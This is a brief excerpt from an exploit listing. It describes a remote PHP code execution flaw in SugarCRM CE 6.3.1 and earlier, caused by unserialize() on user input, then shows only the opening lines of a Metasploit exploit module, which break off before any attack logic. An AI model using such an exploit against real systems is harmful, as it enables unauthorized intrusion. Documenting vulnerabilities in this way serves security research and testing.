SugarCRM CE <= 6.3.1 contains scripts that use "unserialize()" with user controlled input which allows remote malicious users to execute arbitrary PHP code.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions Please see the Metasploit
# web site for more information on licensing and terms of use
# metasploitcom/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit ...